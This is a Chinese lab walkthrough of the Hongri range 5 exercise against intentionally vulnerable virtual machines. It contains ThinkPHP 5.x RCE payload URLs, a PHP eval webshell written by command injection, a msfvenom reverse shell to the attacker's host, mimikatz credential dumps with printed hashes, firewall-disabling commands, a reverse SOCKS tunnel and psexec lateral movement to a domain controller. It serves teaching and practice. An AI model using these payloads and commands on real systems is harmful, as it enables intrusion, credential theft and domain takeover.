红日靶场5

这篇具有很好参考价值的文章主要介绍了红日靶场5。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

前言

外网渗透

信息收集

1、arp探测

2、nmap

3、nikto

4、whatweb

5、gobuster

6、dirsearch

漏洞探测

ThinKPHP漏洞

漏洞利用

get shell

内网渗透

信息收集

CS 启动!

CS连接

CS信息收集

1、hashdump

2、猕猴桃

3、端口扫描

MSF启动!

MSF木马生成

MSF监听模块

MSF信息收集

1、添加内网路由

2、引入本地流量

3、密码抓取

4、关闭防火墙

5、get win7

6、get 域控

前言

红日靶场5,红日靶场打靶练习,网络安全


靶机一共分为两台,一台win7模拟web服务器,一台windows 2008 用来模拟内网环境。win7可被当作跳板机。

win7
账号:sun\heart
密码:123.com
win7内域用户登录
账号:Administrator
密码:dc123.com


windows 2008 server
账号:sun\admin 2020.com
密码:2020.com


在打靶之前要先把win7 c盘内的phpstudy打开!

win7是双网卡,只需要将自己的nat网卡网段改为同win7一样的网段即可,也就是135!

外网渗透

信息收集

1、arp探测

┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.135.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.135.1   00:50:56:c0:00:08       VMware, Inc.
192.168.135.2   00:50:56:ec:d1:ca       VMware, Inc.
192.168.135.150 00:0c:29:ce:6e:f7       VMware, Inc.
192.168.135.254 00:50:56:e7:9c:50       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.432 seconds (105.26 hosts/sec). 4 responded

2、nmap

端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.135.150 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 09:53 CST
Nmap scan report for 192.168.135.150
Host is up (0.00061s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:CE:6E:F7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds


信息收集

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -O -A -p 80,3306 192.168.135.150 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 10:11 CST
Nmap scan report for 192.168.135.150
Host is up (0.00054s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:CE:6E:F7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 8.1 R1 (96%), Microsoft Windows Phone 7.5 or 8.0 (96%), Microsoft Windows Embedded Standard 7 (96%), Microsoft Windows Server 2008 or 2008 Beta 3 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (92%), Microsoft Windows 7 Professional or Windows 8 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (92%), Microsoft Windows 7 (90%), Microsoft Windows Server 2008 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.135.150

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.56 seconds


3、nikto

┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.135.150
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.135.150
+ Target Hostname:    192.168.135.150
+ Target Port:        80
+ Start Time:         2024-01-09 10:14:52 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
+ /: Retrieved x-powered-by header: PHP/5.5.38.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OpenSSL/1.0.2j appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/2.4.23 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.5.38 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.5 - PHP 3/4/5 and 7.0 are End of Life products without support.

4、whatweb

┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.135.150
WhatWeb report for http://192.168.135.150
Status    : 200 OK
Title     : <None>
IP        : 192.168.135.150
Country   : RESERVED, ZZ

Summary   : Apache[2.4.23], HTTPServer[Windows (32 bit)][Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38], OpenSSL[1.0.2j], PHP[5.5.38], Script[text/javascript], X-Powered-By[PHP/5.5.38]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.23 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Windows (32 bit)
        String       : Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38 (from server string)

[ OpenSSL ]
        The OpenSSL Project is a collaborative effort to develop a
        robust, commercial-grade, full-featured, and Open Source
        toolkit implementing the Secure Sockets Layer (SSL v2/v3)
        and Transport Layer Security (TLS v1) protocols as well as
        a full-strength general purpose cryptography library.

        Version      : 1.0.2j
        Website     : http://www.openssl.org/

[ PHP ]
        PHP is a widely-used general-purpose scripting language
        that is especially suited for Web development and can be
        embedded into HTML. This plugin identifies PHP errors,
        modules and versions and extracts the local file path and
        username if present.

        Version      : 5.5.38
        Version      : 5.5.38
        Google Dorks: (2)
        Website     : http://www.php.net/

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.

        String       : text/javascript

[ X-Powered-By ]
        X-Powered-By HTTP header

        String       : PHP/5.5.38 (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 09 Jan 2024 02:13:06 GMT
        Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
        X-Powered-By: PHP/5.5.38
        Content-Length: 931
        Connection: close
        Content-Type: text/html; charset=utf-8

5、gobuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.135.150 -x php,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.135.150
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 931]
/index.php            (Status: 200) [Size: 931]
/0                    (Status: 200) [Size: 931]
/static               (Status: 301) [Size: 238] [--> http://192.168.135.150/static/]
/add.php              (Status: 200) [Size: 1643]
/Index                (Status: 200) [Size: 931]
/Index.php            (Status: 200) [Size: 931]
/robots.txt           (Status: 200) [Size: 24]
/captcha              (Status: 200) [Size: 1674]
/%20                  (Status: 403) [Size: 210]
/INDEX                (Status: 200) [Size: 931]
/INDEX.php            (Status: 200) [Size: 931]
/Add.php              (Status: 200) [Size: 1643]
===============================================================
Finished
===============================================================

6、dirsearch

┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.135.150 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.135.150/_24-01-09_10-16-21.txt

Target: http://192.168.135.150/

[10:16:21] Starting:
[10:16:59] 404 -  236B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:17:02] 404 -  205B  - /a%5c.aspx
[10:17:10] 200 -    2KB - /add.php
[10:18:42] 200 -    1KB - /favicon.ico
[10:19:37] 200 -   24B  - /robots.txt
[10:19:48] 301 -  238B  - /static  ->  http://192.168.135.150/static/
[10:19:48] 301 -  240B  - /static..  ->  http://192.168.135.150/static../

Task Completed

漏洞探测

ThinKPHP漏洞

红日靶场5,红日靶场打靶练习,网络安全


红日靶场5,红日靶场打靶练习,网络安全


当我们访问不存在的目录即可获取到框架的版本信息!

漏洞利用

红日靶场5,红日靶场打靶练习,网络安全


利用searchsploit可以发现利用漏洞!5.0版本存在RCE漏洞!我们利用一下!

payload


┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 46150.txt
  Exploit: ThinkPHP 5.X - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/46150
     Path: /usr/share/exploitdb/exploits/php/webapps/46150.txt
    Codes: N/A
 Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /root/kali/46150.txt



┌──(root㉿ru)-[~/kali]
└─# cat 46150.txt
# Exploit Title: thinkphp 5.X RCE
# Date: 2019-1-14
# Exploit Author: vr_system
# Vendor Homepage: http://www.thinkphp.cn/
# Software Link: http://www.thinkphp.cn/down.html
# Version: 5.x
# Tested on: windows 7/10
# CVE : None

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

1、https://blog.thinkphp.cn/869075
2、https://blog.thinkphp.cn/910675

POC:

thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.*
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

未知版本
16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23(完整版)debug模式
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(完整版)
33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thhinkphp 5.0.10(完整版)
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system


框架的版本是5.0.22

我们利用此版本漏洞

thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


红日靶场5,红日靶场打靶练习,网络安全


漏洞利用成功!说明存在此漏洞!我们可以写入木马然后利用蚁剑、冰蝎、菜刀连接!

get shell

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd

获取当前路径!

红日靶场5,红日靶场打靶练习,网络安全


paylaod

echo "<?php @eval($_POST['shell']);?>" > C:\phpStudy\PHPTutorial\WWW\public\shell.php

把木马写到当前路径下的shell.php文件!

完整payload
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval($_POST[%27shell%27]);?%3E%22%20%3E%20C:\phpStudy\PHPTutorial\WWW\public\shell.php

红日靶场5,红日靶场打靶练习,网络安全


红日靶场5,红日靶场打靶练习,网络安全


内网渗透

信息收集

红日靶场5,红日靶场打靶练习,网络安全


主机是win7

外网主机IP:192.168.135.150
内网IP:192.168.138.136

那么内网网段就是138

DNS是sun.com,DNS服务器的地址是:192.168.138.138

红日靶场5,红日靶场打靶练习,网络安全


使用arp来查看当前网口的ip地址

可以发现138网段内还有内一个ip地址,那么这个IP地址也就是另一台内网主机了!

红日靶场5,红日靶场打靶练习,网络安全


 尝试ping DNS
 
 回显的地址就是域控主机,也就是内网中另一台主机,IP是:192.168.138.138


红日靶场5,红日靶场打靶练习,网络安全


信息收集的差不多就可以进行下一步了!这里有两种思路!

1、使用CS生成木马-监听-拿到shell

2、使用msf生成木马--监听--拿到shell

CS 启动!

CS连接

红日靶场5,红日靶场打靶练习,网络安全


红日靶场5,红日靶场打靶练习,网络安全


红日靶场5,红日靶场打靶练习,网络安全


生成一个windows木马文件!

红日靶场5,红日靶场打靶练习,网络安全


直接拖进去即可!

然后直接在命令行中启动即可!

红日靶场5,红日靶场打靶练习,网络安全


cs就上线成功了!

CS信息收集

红日靶场5,红日靶场打靶练习,网络安全


记得把会话返回时间改为0

红日靶场5,红日靶场打靶练习,网络安全


红日靶场5,红日靶场打靶练习,网络安全


  成功拿到system最高权限啦!

怎么拿到密码呢

1、使用cs自带的hashdump

2、使用cs自带的猕猴桃 或者直接运行 logonpasswords 也是可以的!

1、hashdump

红日靶场5,红日靶场打靶练习,网络安全


红日靶场5,红日靶场打靶练习,网络安全


2、猕猴桃

红日靶场5,红日靶场打靶练习,网络安全


红日靶场5,红日靶场打靶练习,网络安全


得到外网主机的账号密码

leo  123.com

Administrator  dc123.com   域管理员的账号

域是SUN

3、端口扫描

红日靶场5,红日靶场打靶练习,网络安全


红日靶场5,红日靶场打靶练习,网络安全


这样利用cs就能获取到内网主机的端口了!

MSF启动!

MSF木马生成

┌──(root㉿ru)-[~/kali]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.135.128 lport=1111 -f exe -o 1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: 1.exe


MSF监听模块

msf6 exploit(multi/script/web_delivery) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interfac
                                     e may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.135.128
lhost => 192.168.135.128
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > run

生成的木马端口和ip一定要和监听端一样哈!

红日靶场5,红日靶场打靶练习,网络安全


上传到蚁剑并运行即可反弹shell!

红日靶场5,红日靶场打靶练习,网络安全


MSF信息收集

1、添加内网路由
前面我们信息收集到,内网ip网段为 192.168.138.0/24

红日靶场5,红日靶场打靶练习,网络安全


run autoroute -s 192.168.138.0/24   添加内网路由

run autoroute -p   查看路由


2、引入本地流量
到这一步,我们就可以先把本地kali流量通过内网穿透工具带到内网!

我这里使用ew工具,也可以使用frpc、aliver等!

红日靶场5,红日靶场打靶练习,网络安全


红日靶场5,红日靶场打靶练习,网络安全


上传蚁剑 --  运行  -- 建立连接成功


./ew_for_linux64 -s rcsocks -l 2222 -e 3333
ew_for_win.exe -s rssocks -d 192.168.135.128 -e 3333

rcsocks、rssocks用于反向连接

-l:指定本地监听端口
-e:指定转发流量端口
-d:指定连接主机


3、密码抓取
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.


meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).


meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain  LM                                NTLM                              SHA1
--------       ------  --                                ----                              ----
Administrator  SUN     c8c42d085b5e3da2e9260223765451f1  e8bea972b3549868cecd667a64a6ac46  3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
WIN7$          SUN                                       ad1f7aa2324f0629cc1dd6c9b8321924  38796bed48c38b20b659bf91ccf8a9f8c2ef57ee
leo            SUN     b73a13e9b7832a35aad3b435b51404ee  afffeba176210fad4628f0524bfe1942  fa83a92197d9896cb41463b7a917528b4009c650

wdigest credentials
===================

Username       Domain  Password
--------       ------  --------
(null)         (null)  (null)
Administrator  SUN     dc123.com
WIN7$          SUN     8a ea 8b 0d 3e c9 83 64 9c 07 24 92 77 40 3f f0 5a bd e0 6f a2 0c ee 22 03 58 02 a4 20 a7 8f fa 8b 55 27 1d b3 a8 ac 4d 67 9c 80 a7 cd 99 8a 09 12 38 3f fd 59 54 77 24 60
                        a0 02 e7 e0 df c0 56 eb 12 fd 7a 80 af 92 2f 88 c7 8c 5c 67 ee 81 68 bd a9 02 ee a9 b4 97 db 52 5d 1e 23 95 e8 94 e3 51 9c 79 81 d4 9f 30 0e 29 0d be 3d 29 95 13 cc f8 f
                       e 97 0e 6c 3e bc 36 98 99 b7 66 7e 9d 98 af d0 e9 f4 14 86 d9 d0 8d 6a 48 e0 6d d6 9d 63 5e 46 b5 e9 de f5 45 05 a3 ea 60 0e de f8 9e 38 e1 53 e3 6c 4b f4 dc 8b 08 31 af
                       b3 b2 30 fb b3 32 78 ba b1 7a 2a 2d 11 f0 67 ee 4a 1a 45 81 53 63 15 b7 4d 78 8c a8 31 c6 51 93 9b 5a c9 0e db 13 f0 dd 39 52 f2 2a 65 37 00 56 ec a7 a0 fe ef 9d 89 46 4f
                        cf f2 9f 8a 90 96 74 ea e9 28 fa 49 ed
leo            SUN     123.com

tspkg credentials
=================

Username       Domain  Password
--------       ------  --------
Administrator  SUN     dc123.com
leo            SUN     123.com

kerberos credentials
====================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  SUN.COM  dc123.com
leo            SUN.COM  123.com
win7$          SUN.COM  8a ea 8b 0d 3e c9 83 64 9c 07 24 92 77 40 3f f0 5a bd e0 6f a2 0c ee 22 03 58 02 a4 20 a7 8f fa 8b 55 27 1d b3 a8 ac 4d 67 9c 80 a7 cd 99 8a 09 12 38 3f fd 59 54 77 24 6
                        0 a0 02 e7 e0 df c0 56 eb 12 fd 7a 80 af 92 2f 88 c7 8c 5c 67 ee 81 68 bd a9 02 ee a9 b4 97 db 52 5d 1e 23 95 e8 94 e3 51 9c 79 81 d4 9f 30 0e 29 0d be 3d 29 95 13 cc f8
                         fe 97 0e 6c 3e bc 36 98 99 b7 66 7e 9d 98 af d0 e9 f4 14 86 d9 d0 8d 6a 48 e0 6d d6 9d 63 5e 46 b5 e9 de f5 45 05 a3 ea 60 0e de f8 9e 38 e1 53 e3 6c 4b f4 dc 8b 08 31
                        af b3 b2 30 fb b3 32 78 ba b1 7a 2a 2d 11 f0 67 ee 4a 1a 45 81 53 63 15 b7 4d 78 8c a8 31 c6 51 93 9b 5a c9 0e db 13 f0 dd 39 52 f2 2a 65 37 00 56 ec a7 a0 fe ef 9d 89 4
                        6 4f cf f2 9f 8a 90 96 74 ea e9 28 fa 49 ed


load kiwi  --  getsystem   --  creds_all

得到域管理员以及普通用户的账号以及密码:

win7:
Administrator     dc123.com 
leo               123.com


4、关闭防火墙
netsh advfirewall show allprofiles   查看防火墙的状态

netsh advfirewall set allprofiles state off   关闭防护墙


红日靶场5,红日靶场打靶练习,网络安全


5、get win7
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

参数为1:开启服务
参数为0:关闭服务


红日靶场5,红日靶场打靶练习,网络安全


登录成功!

6、get 域控
我们使用Psexec登录域控

在此之前,我们要先关闭防火墙


C:\phpStudy\PHPTutorial\WWW\public>net use \\192.168.138.138\ipc$ "1qaz@WSX" /user:"Administrator"
net use \\192.168.138.138\ipc$ "1qaz@WSX" /user:"Administrator"
The command completed successfully.


C:\phpStudy\PHPTutorial\WWW\public>sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
[SC] CreateService SUCCESS

C:\phpStudy\PHPTutorial\WWW\public>sc \\192.168.138.138 start unablefirewall
sc \\192.168.138.138 start unablefirewall
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.


C:\phpStudy\PHPTutorial\WWW\public>


红日靶场5,红日靶场打靶练习,网络安全


使用psexec模块


msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.138.138  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             sun              no        The Windows domain to use for authentication
   SMBPass               1qaz@WSX         no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               administrator    no        The username to authenticate as


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.138.138  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > setg proxies socks5:127.0.0.1:2222
proxies => socks5:127.0.0.1:2222


事先开好代理,并把流量带到win7,在使用psexec时,开启全局代理!

红日靶场5,红日靶场打靶练习,网络安全文章来源地址https://www.toymoban.com/news/detail-795418.html


meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:65dc23a67f31503698981f2665f9d858:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
leo:1110:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:4062133d1d6015f7f64f9ee1c118eff0:::
WIN7$:1105:aad3b435b51404eeaad3b435b51404ee:ad1f7aa2324f0629cc1dd6c9b8321924:::

ok!拿到两台主机meterpreter之后就算完成靶机的渗透了!

权限维持,可以搜一下教程!也很简单!

到了这里,关于红日靶场5的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 如何利用在线网络靶场将安全提升至新水平

    在 Standoff 365 的在线网络靶场中,任何公司都可以试验信息安全手段和企业网络设置,优化攻击检测、响应和事件调查的技能。 2023 年,我们不仅准许攻击者使用,也准许防御者使用。我们可以根据客户要求轻松部署 10 个细分行业中的任一行业,或帮助公司重建他们自己

    2024年01月20日
    浏览(53)
  • [网络安全]xss-labs 本地靶场搭建详细教程

    本文以phpstudy搭建xss-labs本地靶场环境 PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。 官网安装地址: PhpStudy Download 链接 安装完成后打开PhpStudy 网站配置如下: xss-labs 靶机下载地址: https://github.com/do0d

    2024年02月08日
    浏览(39)
  • [网络安全]upload-labs 本地靶场搭建详细教程

    本文以phpstudy搭建upload-labs本地靶场环境 PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。 官网安装地址: PhpStudy Download 链接 安装完成后打开PhpStudy 网站配置如下: upload-labs 靶机下载地址: https://github.co

    2024年02月08日
    浏览(62)
  • 网络安全技术新手入门:在docker上安装dvwa靶场

    准备工作:1.已经安装好kali linux 步骤总览:1.安装好docker     2.拖取镜像,安装dvwa 输入命令: sudo su 输入命令: curl  -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - 输入命令: echo \\\'deb https://download.docker.com/linux/debian stretch stable\\\' /etc/apt/sources.list.d/docker.list tips:此处

    2024年01月20日
    浏览(39)
  • [网络安全]XSS之Cookie外带攻击姿势及例题详析(基于DVWA靶场)

    本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而 窃取用户的 Cookie 信息 。 在使用XSS语

    2024年02月08日
    浏览(52)
  • 网络安全概述练习题

    一.单选 1.全球的13台根域名服务器由哪个机构统一管理( A ) A. ICANN           B. IEEE          C. ISO          D. CNCERT 2.我国,中央网络安全和信息化领导小组第一次会议于哪一年召开( B ) A. 2013年          B. 2014年            C. 2015年           D. 2016年 3.以下哪项不

    2024年02月09日
    浏览(36)
  • 【网络安全 --- 任意文件上传漏洞靶场闯关 6-15关】任意文件上传漏洞靶场闯关,让你更深入了解文件上传漏洞以及绕过方式方法,思路技巧

